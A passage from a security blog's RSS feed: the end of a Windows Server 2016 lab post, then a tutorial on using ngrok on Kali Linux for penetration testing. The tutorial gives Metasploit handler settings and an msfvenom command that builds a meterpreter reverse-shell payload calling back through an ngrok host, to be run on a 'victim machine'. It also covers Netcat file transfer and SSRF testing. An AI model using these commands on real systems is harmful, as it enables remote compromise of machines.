<h3 id="identity-and-accessidentityidentity-and-accessmd" class="ftwp-heading"><strong>Identification and access</strong></h3>
<p class="lf-text-block lf-block" data-lf-anchor-id="774d2d27fdbceded2bcf0c565f3e765a:0">New features in Identity improve the ability for organizations to secure Active Directory environments and help them transition to cloud-only and hybrid deployments, where a number of applications and services are hosted in the cloud and others hosted on premises.</p>
<h3 id="administrationadministrationmanage-windows-servermd" class="ftwp-heading"><strong>Administration</strong></h3>
<p class="lf-text-block lf-block" data-lf-anchor-id="af1c3cb7150044b51be6890e01c354f2:0">The management and automation area focuses on tools and reference information for IT professionals who want to run and manage Windows Server 2016, including Windows PowerShell.</p>
<p class="lf-text-block lf-block" data-lf-anchor-id="a74d612f140fa3c517c711080d2f56fa:0">Windows PowerShell 5.1 includes significant new features, including support for development with new classes and security features that expand its use, improve its usability, and allow you to Control and manage your Windows-based environment more easily and comprehensively.</p>
<h3 id="ftoc-may-chu-nano" class="ftwp-heading"><strong>Nano server</strong></h3>
<p><span class="imgContent imgCenter"><span class="imgWrapperOutter"><span class="imgWrapperInner"><a target="_blank" class="iZoom ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwww.tomsitpro.com%2Farticles%2Fbest-windows-server-2016-features%2C2-1061.html%23" rel="noopener external nofollow" onclick="this.target='_blank';"><img decoding="async" title="NanoServer Recovery Console." src="https://anonyviet.com/wp-content/uploads/2017/11/The-Nano-Recovery-Console_w_755.png" alt="NanoServer Recovery Console."/><span class="imgCaption">NanoServer Recovery Console.</span></a></span></span></span></p>
<p>Nano Server saves resources by up to 92% compared to the Windows Server graphical user interface (GUI) installation option.  Beyond just that, here are some compelling reasons to start running Nano for at least some of your Windows Server workloads:</p>
<ul>
<li>Bare-metal OS only starts essential services</li>
<li>Nano is so small that it can be transferred easily across servers, data centers and physical sites.</li>
<li>Nano hosts the most common Windows server workloads.  Including the Hyper-V host, of course.</li>
</ul>
<p>Nano is designed to be fully managed remotely.  However, Nano does not have a user interface, it is represented on a command line interface called “Nano Server Recovery Console”.</p>
<h2 id="ftoc-noi-dung-bai-lab-windows-server-2016" class="ftwp-heading"><strong><span style="color: #800080;">Contents of Lab Windows Server 2016</span></strong></h2>
<p><img decoding="async" src="https://anonyviet.com/wp-content/uploads/2017/11/Untitled_w_600.jpg" alt="Lab install and configure Windows Server 2016 5" title="Lab install and configure Windows Server 2016 8"/></p>
<p>Below is the content of all Lab articles about Windows Server 2016. Labs are recorded in video, exe format so you don&#8217;t need to install any additional software.</p>
<p><strong>1.1</strong> Installing HDH Windows Server 2016 Datacenter (Full Installation)<br /><strong>1.2</strong> Configure NIC Teaming<br /><strong>2.1</strong> Configure Domain Controller and Join Domain<br /><strong>2.2</strong> Configure Additional Domain Controller<br /><strong>2.3</strong> Child Domain Configuration<br /><strong>2.4</strong> Configure Read Only Domain Controller (RODC)<br /><strong>3.1</strong> Create Objects in Active Directory and OU . Admin Authorization<br /><strong>4.1</strong> Creating objects in Active Directory through PowerShell<br /><strong>4.2</strong> Use PowerShell Script to create bulk accounts<br /><strong>4.3</strong> Manage files and folders using Powershell<br /><strong>5.1</strong> Configure Enable Routing and Remote Access feature<br /><strong>5.2</strong> Implement Static Routing Configuration on Windows Server 2016<br /><strong>5.3</strong> Deploy Dynamic Routing Configuration on Windows Server 2016<br /><strong>6.1.</strong> Install and configure the DHCP Server service in conjunction with AD<br /><strong>6.2.</strong> Install and configure DHCP Relay Agent<br /><strong>6.3.</strong> DHCP Server Backup and Restore<br /><strong>7.1</strong> Configure DNS Server (Primary Name Server)<br /><strong>7.2</strong> Deploy Backup DNS Server (Secondary Name Server) configuration<br /><strong>8.1</strong> Install and configure drive partition management<br /><strong>8.2</strong> Soft Raid Configuration<br /><strong>9.1</strong> Basic Group Policy Objects Policy Deployment<br /><strong>9.2</strong> Configure user account policy<br /><strong>10.1</strong> Configure Sharing and Permissions NTFS<br /><strong>10.2</strong> Configure Home Folder<br /><strong>10.3</strong> Configure Roaming User Profile<br /><strong>10.4</strong> Offline File Configuration</p>
<h2 id="ftoc-link-download" class="ftwp-heading"><strong><span style="color: #800080;"> Download link</span></strong></h2>
<p>To download all the exercises about Windows Server 2016, please download from the link below.</p>
<p>If you have problems with the download process, do not hesitate to notify AnonyViet to fix the link</p>
<p style="text-align: center;"><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fdrive.google.com%2Fopen%3Fid%3D1RF-A_Z-sw9E5zP34wTSYQoCaLUoRDW89" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"><span class="td_btn td_btn_md td_outlined_btn">Download link</span></a></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;7045&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/lab-install-and-configure-windows-server-2016/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/12/24-11-2017-09-19-181.jpeg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to configure Ngrok to NAT Port on Kali Linux</title>
		<link>https://en.anonyviet.com/how-to-configure-ngrok-to-nat-port-on-kali-linux/</link>
					<comments>https://en.anonyviet.com/how-to-configure-ngrok-to-nat-port-on-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 11 Jan 2023 09:02:52 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[configure]]></category>
		<category><![CDATA[Kali]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[NAT]]></category>
		<category><![CDATA[Ngrok]]></category>
		<category><![CDATA[Port]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=1023</guid>

					<description><![CDATA[Ngrok is a tool to help you bring services on your computer to the Internet without having to NAT Port or reveal your Public IP. Ngrok is one of my favorite tools and in this article, I will show you a few ways that I used Ngrok during Pentest. Join the channel Telegram of the [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p>Ngrok is a tool to help you bring services on your computer to the Internet without having to NAT Port or reveal your Public IP.  Ngrok is one of my favorite tools and in this article, I will show you a few ways that I used Ngrok during Pentest.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="1023" fifu-featured="1" decoding="async" class="aligncenter wp-image-42438 size-full" src="https://anonyviet.com/wp-content/uploads/2022/07/1_IalYktr6TJArYDKZm2Wwbw.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux" title="How to configure Ngrok to NAT Port on Kali Linux" width="700" height="334" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_IalYktr6TJArYDKZm2Wwbw.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_IalYktr6TJArYDKZm2Wwbw-300x143.jpg 300w" sizes="(max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 26"/></p>
<h2 id="ftoc-cau-hinh-ngrok" class="ftwp-heading">Configure Ngrok</h2>
<p>To use Ngrok, you need an account.  Access <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fngrok.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://ngrok.com/</a> and create an account by email or use the Google | . option  Github Oauth.  Next, download the Ngrok installation file by going to <strong class="lg je">Setup &#038; Installation</strong>then right click option <strong class="lg je">Download for Linux</strong> and copy the link address:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42439 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_qdMVJ0T3nCymsaUXaFBgoA.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 23" width="700" height="198" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_qdMVJ0T3nCymsaUXaFBgoA.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_qdMVJ0T3nCymsaUXaFBgoA-300x85.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 27"/></p>
<p>Next, go to the terminal of the attacker machine and <code class="fr vn vo vp vq b">wget</code> Ngrok ZIP file.  Then unzip, add execute permission and finally move the Ngrok file to /usr/local/bin/:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">cd /tmp&#13;
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip&#13;
unzip ngrok-stable-linux-amd64.zip&#13;
chmod +x ngrok&#13;
sudo mv ngrok /usr/local/bin/</pre>
<p>NOTE: The above link is likely not working for you.  Use the link you copied from the Ngrok homepage.</p>
<h2 id="ftoc-cau-hinh-authtoken" class="ftwp-heading">Configure AuthToken</h2>
<p>Now that you have Ngrok installed, we need to provide Ngrok with the authentication token provided in Ngrok&#8217;s web site.  Access the Your Authtoken tab from within your account:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42440 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_4DUxrC7y9oEGJEnd0BWvzQ.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 24" width="509" height="520" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_4DUxrC7y9oEGJEnd0BWvzQ.jpg 509w, https://anonyviet.com/wp-content/uploads/2022/07/1_4DUxrC7y9oEGJEnd0BWvzQ-294x300.jpg 294w" sizes="auto, (max-width: 509px) 100vw, 509px" title="How to configure Ngrok to NAT Port on Kali Linux 28"/></p>
<p>And then copy the Authtoken:<img decoding="async" loading="lazy" class="size-full wp-image-42441 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_oMZs3kAX5A__uMX-tSfeJA.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 25" width="700" height="219" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_oMZs3kAX5A__uMX-tSfeJA.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_oMZs3kAX5A__uMX-tSfeJA-300x94.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 29"/></p>
<p>Finally, run the following command to configure Ngrok to use this Authtoken:</p>
<p><code>ngrok authtoken 'AUTHTOKEN_GOES_HERE'</code></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42443 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_-acgP8dDF883Xs9I7wlgWw-1.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 26" width="657" height="137" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_-acgP8dDF883Xs9I7wlgWw-1.jpg 657w, https://anonyviet.com/wp-content/uploads/2022/07/1_-acgP8dDF883Xs9I7wlgWw-1-300x63.jpg 300w" sizes="auto, (max-width: 657px) 100vw, 657px" title="How to configure Ngrok to NAT Port on Kali Linux 30"/></p>
<h2 id="ftoc-cac-truong-hop-su-dung-ngrok-cho-pentester-tren-kali-linux" class="ftwp-heading">Ngrok for Pentester Use Cases on Kali Linux</h2>
<p>Here are some use cases of Ngrok in the Pentest process.</p>
<h3 id="ftoc-truyen-tep-bang-netcat" class="ftwp-heading">File transfer using Netcat</h3>
<p>Transferring files to a machine that is not on your local network is not possible but until you know Ngrok.  To provide the Netcat service over the Internet with Ngrok, perform the following steps:</p>
<p>1. Set up a Netcat listener on a port of your choice</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42454 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_aeUemux-v2MtNZVdseWZCw.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 27" width="569" height="143" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_aeUemux-v2MtNZVdseWZCw.jpg 569w, https://anonyviet.com/wp-content/uploads/2022/07/1_aeUemux-v2MtNZVdseWZCw-300x75.jpg 300w" sizes="auto, (max-width: 569px) 100vw, 569px" title="How to configure Ngrok to NAT Port on Kali Linux 31"/></p>
<p>2. Run Ngrok with the tcp command and specify the port you used to start Netcat</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42455 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_WeOzkxNWKNGd9KlstEkZog.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 28" width="608" height="305" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_WeOzkxNWKNGd9KlstEkZog.jpg 608w, https://anonyviet.com/wp-content/uploads/2022/07/1_WeOzkxNWKNGd9KlstEkZog-300x150.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/07/1_WeOzkxNWKNGd9KlstEkZog-360x180.jpg 360w" sizes="auto, (max-width: 608px) 100vw, 608px" title="How to configure Ngrok to NAT Port on Kali Linux 32"/></p>
<p>After pressing enter, Ngrok&#8217;s session status dashboard will appear from where you can get the URL:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42456 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_jGUYQcY0M1GNw-MDb6U9vw.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 29" width="700" height="233" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_jGUYQcY0M1GNw-MDb6U9vw.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_jGUYQcY0M1GNw-MDb6U9vw-300x100.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 33"/></p>
<p>3. On the target machine, use the URI provided by Ngrok to transfer the file using Netcat.  Note that the tcp:// URI is not used when specifying the URL for Netcat.  And don&#8217;t forget to remove the : and replace it with a space:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42457 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_TU1Y5aIP0N8fFwAFK9E0kA.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 30" width="700" height="186" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_TU1Y5aIP0N8fFwAFK9E0kA.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_TU1Y5aIP0N8fFwAFK9E0kA-300x80.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 34"/></p>
<h3 id="ftoc-truyen-file-bang-may-chu-http" class="ftwp-heading">File transfer using HTTP server</h3>
<p>Sometimes you want to transfer files using simple HTTP servers like Python&#8217;s http.server module.  To transfer files from your local machine over the Internet using a locally hosted HTTP server, perform the following steps:</p>
<p>1. Start the HTTP server on the port you want</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42458 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_wocVC6oaMb_5Eh8gDLeSxg.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 31" width="620" height="129" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_wocVC6oaMb_5Eh8gDLeSxg.jpg 620w, https://anonyviet.com/wp-content/uploads/2022/07/1_wocVC6oaMb_5Eh8gDLeSxg-300x62.jpg 300w" sizes="auto, (max-width: 620px) 100vw, 620px" title="How to configure Ngrok to NAT Port on Kali Linux 35"/></p>
<p>2. Run Ngrok with http command and specify the port you used to start the HTTP server on</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42459 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_R-9YcwCS4HVuwjPPFZJRHg.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 32" width="556" height="187" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_R-9YcwCS4HVuwjPPFZJRHg.jpg 556w, https://anonyviet.com/wp-content/uploads/2022/07/1_R-9YcwCS4HVuwjPPFZJRHg-300x101.jpg 300w" sizes="auto, (max-width: 556px) 100vw, 556px" title="How to configure Ngrok to NAT Port on Kali Linux 36"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42460 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_jGUYQcY0M1GNw-MDb6U9vw-1.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 33" width="700" height="233" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_jGUYQcY0M1GNw-MDb6U9vw-1.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_jGUYQcY0M1GNw-MDb6U9vw-1-300x100.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 37"/></p>
<p>3. On the target machine, use the URI provided by Ngrok to download the file</p>
<p><code>curl -o file.txt a96c-73-30-177-39.ngrok.io/file.txt</code></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42461 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_BsT7SkPgaoFdBz7vsIH4Ow.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 34" width="700" height="223" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_BsT7SkPgaoFdBz7vsIH4Ow.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_BsT7SkPgaoFdBz7vsIH4Ow-300x96.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 38"/></p>
<h3 id="ftoc-metasploit-reverse-shells-qua-internet" class="ftwp-heading">Metasploit Reverse Shells over the Internet</h3>
<p>Creating a Msfvenom payload with a local IP address restricts you by only allowing you to generate payloads for local machines.  To create a payload for a remote machine that reconnects over the Internet to your local Metasploit, perform the following steps:</p>
<p>1. Run Ngrok and specify the local port on which the handler should listen</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42462 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_G-XPoybeL8Yi2I2ANgGalw.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 35" width="505" height="160" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_G-XPoybeL8Yi2I2ANgGalw.jpg 505w, https://anonyviet.com/wp-content/uploads/2022/07/1_G-XPoybeL8Yi2I2ANgGalw-300x95.jpg 300w" sizes="auto, (max-width: 505px) 100vw, 505px" title="How to configure Ngrok to NAT Port on Kali Linux 39"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42463 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_5qiL_LG-xh9BmtpoAcz4ig.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 36" width="700" height="249" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_5qiL_LG-xh9BmtpoAcz4ig.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_5qiL_LG-xh9BmtpoAcz4ig-300x107.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 40"/></p>
<p>2. Start the Metasploit handler and configure the ReverseListenerBindAddress and ReverseListenerBindPort options so that when they connect, they forward traffic to localhost:4444:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">use exploit/multi/handler&#13;
set lhost 6.tcp.ngrok.io&#13;
set lport 16737&#13;
set payload linux/x64/meterpreter/reverse_tcp&#13;
set ReverseListenerBindAddress 127.0.0.1&#13;
set ReverseListenerBindPort 4444&#13;
run -j</pre>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42464 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_AxFNPvYUqR1fPbeLhbcszg.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 37" width="700" height="307" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_AxFNPvYUqR1fPbeLhbcszg.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_AxFNPvYUqR1fPbeLhbcszg-300x132.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to Configure Ngrok to NAT Port on Kali Linux 41"/></p>
<p>3. Create the Msfvenom payload and specify the URI provided by Ngrok as the LHOST . parameter</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o revsh LHOST=6.tcp.ngrok.io LPORT=16737</pre>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42465 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_WJRE9H4AIde2zBlCfR54BA.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 38" width="700" height="173" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_WJRE9H4AIde2zBlCfR54BA.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_WJRE9H4AIde2zBlCfR54BA-300x74.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 42"/></p>
<p>4. Transfer the file to the victim machine and then run the payload.  You should get the connection back on your local Metasploit handler:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42466 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_gO8djRojWtcRNOjwQJnmIQ.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 39" width="700" height="287" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_gO8djRojWtcRNOjwQJnmIQ.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_gO8djRojWtcRNOjwQJnmIQ-300x123.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 43"/></p>
<p>NOTE: Be careful when using Ngrok for reverse shells.  If left unchecked, you could unknowingly expose your customers&#8217; networks to the bad guys.</p>
<h3 id="ftoc-kiem-tra-loi-hong-tuong-tac-dich-vu" class="ftwp-heading">Service Interaction Vulnerability Check</h3>
<p>Testing for external server interactions such as server-side request forgery (SSRF) can be quickly accomplished using Ngrok.  Just create an Ngrok listener on any port you want and then use the provided URL to include potentially vulnerable parameters like HTTP headers, URL redirect parameters, etc. to try Try to find the OOD service interaction vulnerability:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42467 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_YkXhda9Dcpn2JS_UN4EA_Q.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 40" width="475" height="148" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_YkXhda9Dcpn2JS_UN4EA_Q.jpg 475w, https://anonyviet.com/wp-content/uploads/2022/07/1_YkXhda9Dcpn2JS_UN4EA_Q-300x93.jpg 300w" sizes="auto, (max-width: 475px) 100vw, 475px" title="How to configure Ngrok to NAT Port on Kali Linux 44"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42468 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_K2FJLlzoJsysGX6f3tlICg.jpg" alt="How to Configure Ngrok to NAT Port on Kali Linux 41" width="700" height="210" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_K2FJLlzoJsysGX6f3tlICg.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_K2FJLlzoJsysGX6f3tlICg-300x90.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 45"/></p>
<p>Then we can simulate an OOB service with cURL:</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-42469 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/1_GYV7NOzVnlZ9XIDaFAxe1g.jpg" alt="How to configure Ngrok to NAT Port on Kali Linux 42" width="700" height="460" srcset="https://anonyviet.com/wp-content/uploads/2022/07/1_GYV7NOzVnlZ9XIDaFAxe1g.jpg 700w, https://anonyviet.com/wp-content/uploads/2022/07/1_GYV7NOzVnlZ9XIDaFAxe1g-300x197.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to configure Ngrok to NAT Port on Kali Linux 46"/></p>
<p>As you can see, several GET requests were sent to the Ngrok listener, which can be used to confirm vulnerabilities like SSRF.</p>
<p>In addition, you can also use RAT without opening the Port with Ngrok <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fdung-rat-khong-can-mo-port%2F" rel="noopener" class="local-link">here</a>.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;42437&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-configure-ngrok-to-nat-port-on-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2022/07/1_IalYktr6TJArYDKZm2Wwbw.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
